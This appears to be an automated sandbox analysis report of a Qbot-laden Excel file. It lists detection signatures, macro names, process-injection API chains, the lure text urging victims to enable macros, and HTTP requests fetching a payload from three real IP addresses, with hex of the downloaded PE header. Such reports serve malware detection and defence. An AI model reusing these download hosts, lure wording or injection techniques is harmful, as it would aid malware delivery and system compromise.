Windows Analysis Report Document_748968552-10062021.xls

Overview

General Information

Sample Name: Document_748968552-10062021.xls
Analysis ID: 498107
MD5: 140385a5f54604fa006db5ffd1b64b5a
SHA1: 73673b923c566c9d6eccad4be74044bcf7e12733
SHA256: 9644edafe62913d5442c6849e44a9a8e780cf465f44c677bab0894ae9561985a
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.489853323.00000000028E0000.00000004.00000001.sdmp
Source: Binary string: c:\Think\Evening\Plan\Base\Think.pdb source: regsvr32.exe, 00000004.00000002.489763377.000000006E083000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.582378510.000000006DED3000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.490164469.00000000028E0000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01AEF6 FindFirstFileW,FindNextFileW, 4_2_6E01AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6AEF6 FindFirstFileW,FindNextFileW, 6_2_6DE6AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0008AEF6 FindFirstFileW,FindNextFileW, 7_2_0008AEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCBAEF6 FindFirstFileW,FindNextFileW, 12_2_6DCBAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0AEF6 FindFirstFileW,FindNextFileW, 15_2_6DB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0008AEF6 FindFirstFileW,FindNextFileW, 16_2_0008AEF6

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44475.7050777778[1].dat.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.107:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.107:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Oct 2021 14:55:00 GMTContent-Type: application/octet-streamContent-Length: 1087488Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44475.7050777778.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 df 36 c6 74 be 58 95 74 be 58 95 74 be 58 95 c0 22 ac 95 76 be 58 95 e3 e0 59 94 76 be 58 95 7d c6 cb 95 6d be 58 95 bf d1 5a 94 70 be 58 95 bf d1 5d 94 61 be 58 95 bf d1 5c 94 7e be 58 95 bf d1 5d 94 55 be 58 95 c0 22 b7 95 73 be 58 95 74 be 59 95 cc be 58 95 bf d1 59 94 75 be 58 95 bf d1 52 94 4f be 58 95 bf d1 58 94 75 be 58 95 bf d1 5a 94 75 be 58 95 52 69 63 68 74 be 58 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fd f7 6c 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 18 07 00 00 8c 13 00 00 00 00 00 ec 45 00 00 00 10 00 00 00 30 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 1a 00 00 04 00 00 8f be 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 77 10 00 a4 00 00 00 04 78 10 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1a 00 9c 1d 00 00 24 65 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 65 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 16 07 00 00 10 00 00 00 18 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 50 09 00 00 30 07 00 00 52 09 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 1a 0a 00 00 90 10 00 00 0c 00 00 00 6e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 b0 1a 00 00 1e 00 00 00 7a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Oct 2021 14:55:03 GMTContent-Type: application/octet-streamContent-Length: 1087488Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44475.7050777778.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 df 36 c6 74 be 58 95 74 be 58 95 74 be 58 95 c0 22 ac 95 76 be 58 95 e3 e0 59 94 76 be 58 95 7d c6 cb 95 6d be 58 95 bf d1 5a 94 70 be 58 95 bf d1 5d 94 61 be 58 95 bf d1 5c 94 7e be 58 95 bf d1 5d 94 55 be 58 95 c0 22 b7 95 73 be 58 95 74 be 59 95 cc be 58 95 bf d1 59 94 75 be 58 95 bf d1 52 94 4f be 58 95 bf d1 58 94 75 be 58 95 bf d1 5a 94 75 be 58 95 52 69 63 68 74 be 58 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fd f7 6c 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 18 07 00 00 8c 13 00 00 00 00 00 ec 45 00 00 00 10 00 00 00 30 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 1a 00 00 04 00 00 8f be 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 77 10 00 a4 00 00 00 04 78 10 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1a 00 9c 1d 00 00 24 65 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 65 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 16 07 00 00 10 00 00 00 18 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 50 09 00 00 30 07 00 00 52 09 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 1a 0a 00 00 90 10 00 00 0c 00 00 00 6e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 b0 1a 00 00 1e 00 00 00 7a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Oct 2021 14:55:04 GMTContent-Type: application/octet-streamContent-Length: 1087488Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44475.7050777778.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 df 36 c6 74 be 58 95 74 be 58 95 74 be 58 95 c0 22 ac 95 76 be 58 95 e3 e0 59 94 76 be 58 95 7d c6 cb 95 6d be 58 95 bf d1 5a 94 70 be 58 95 bf d1 5d 94 61 be 58 95 bf d1 5c 94 7e be 58 95 bf d1 5d 94 55 be 58 95 c0 22 b7 95 73 be 58 95 74 be 59 95 cc be 58 95 bf d1 59 94 75 be 58 95 bf d1 52 94 4f be 58 95 bf d1 58 94 75 be 58 95 bf d1 5a 94 75 be 58 95 52 69 63 68 74 be 58 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fd f7 6c 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 18 07 00 00 8c 13 00 00 00 00 00 ec 45 00 00 00 10 00 00 00 30 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 1a 00 00 04 00 00 8f be 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 77 10 00 a4 00 00 00 04 78 10 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 1a 00 9c 1d 00 00 24 65 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 65 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 16 07 00 00 10 00 00 00 18 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 50 09 00 00 30 07 00 00 52 09 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 1a 0a 00 00 90 10 00 00 0c 00 00 00 6e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 b0 1a 00 00 1e 00 00 00 7a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.107Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.140.114.111Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.50Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.107
Source: regsvr32.exe, 00000004.00000002.489373144.00000000023D0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.581202819.0000000002070000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.877955987.0000000002070000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.490733503.0000000001C70000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.489126953.0000000001F00000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.584981238.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.581022938.0000000001D70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.590289184.00000000009B0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.584823458.00000000008C0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.489373144.00000000023D0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.581202819.0000000002070000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.877955987.0000000002070000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.585331966.0000000000D60000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat Jump to behavior
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.107Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.140.114.111Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44475.7050777778.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.50Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi|eor
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[2].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44475.7050777778[3].dat Jump to dropped file
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E026EF0 4_2_6E026EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E02237E 4_2_6E02237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E021790 4_2_6E021790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E025000 4_2_6E025000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE75000 6_2_6DE75000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE71790 6_2_6DE71790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE7237E 6_2_6DE7237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE76EF0 6_2_6DE76EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00095000 7_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00096EF0 7_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0009237E 7_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00091790 7_2_00091790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC5000 12_2_6DCC5000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC1790 12_2_6DCC1790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC237E 12_2_6DCC237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DCC6EF0 12_2_6DCC6EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB15000 15_2_6DB15000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB11790 15_2_6DB11790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB1237E 15_2_6DB1237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB16EF0 15_2_6DB16EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00095000 16_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00096EF0 16_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0009237E 16_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00091790 16_2_00091790
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Document_748968552-10062021.xls OLE, VBA macro line: Sub auto_close()
Source: Document_748968552-10062021.xls OLE, VBA macro line: Sub auto_open()
Source: Document_748968552-10062021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 4_2_6E01C702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 4_2_6E01CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DE6CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 6_2_6DE6CBB9
